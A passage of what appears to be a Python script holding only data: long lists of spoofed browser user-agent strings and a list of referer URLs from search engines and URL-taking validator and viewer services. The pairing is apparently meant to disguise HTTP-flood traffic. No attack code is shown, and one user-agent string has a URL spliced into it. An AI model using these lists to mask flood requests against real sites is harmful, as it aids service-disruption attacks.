"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20","Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a","Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2","Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0","Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1","Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2","Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0","Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN","Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
ref = ['http://help.baidu.com/searchResult?keywords=',
'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=',
'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=',
'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=',
'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=']
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
